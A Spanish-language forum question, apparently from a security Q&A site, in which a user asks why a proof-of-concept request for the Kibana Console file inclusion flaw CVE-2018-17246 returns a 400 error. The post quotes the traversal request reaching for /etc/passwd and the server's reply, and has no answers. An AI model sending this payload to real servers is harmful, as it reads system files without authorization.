Explotación CVE-2018-17246

0

He estado intentando usar este código de PoC para la vulnerabilidad de inclusión de archivos arbitrarios en la consola Kibana Sense.

La solicitud:

/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

está devolviendo el siguiente error:

{"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"}],"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"},"status":400}

He recibido este error en varias instancias, por lo que creo que debe haber algún cambio de configuración realizado antes de usar esta solicitud.

    
pregunta Srikanth Suresh 21.12.2018 - 09:37
fuente

0 respuestas

Lea otras preguntas en las etiquetas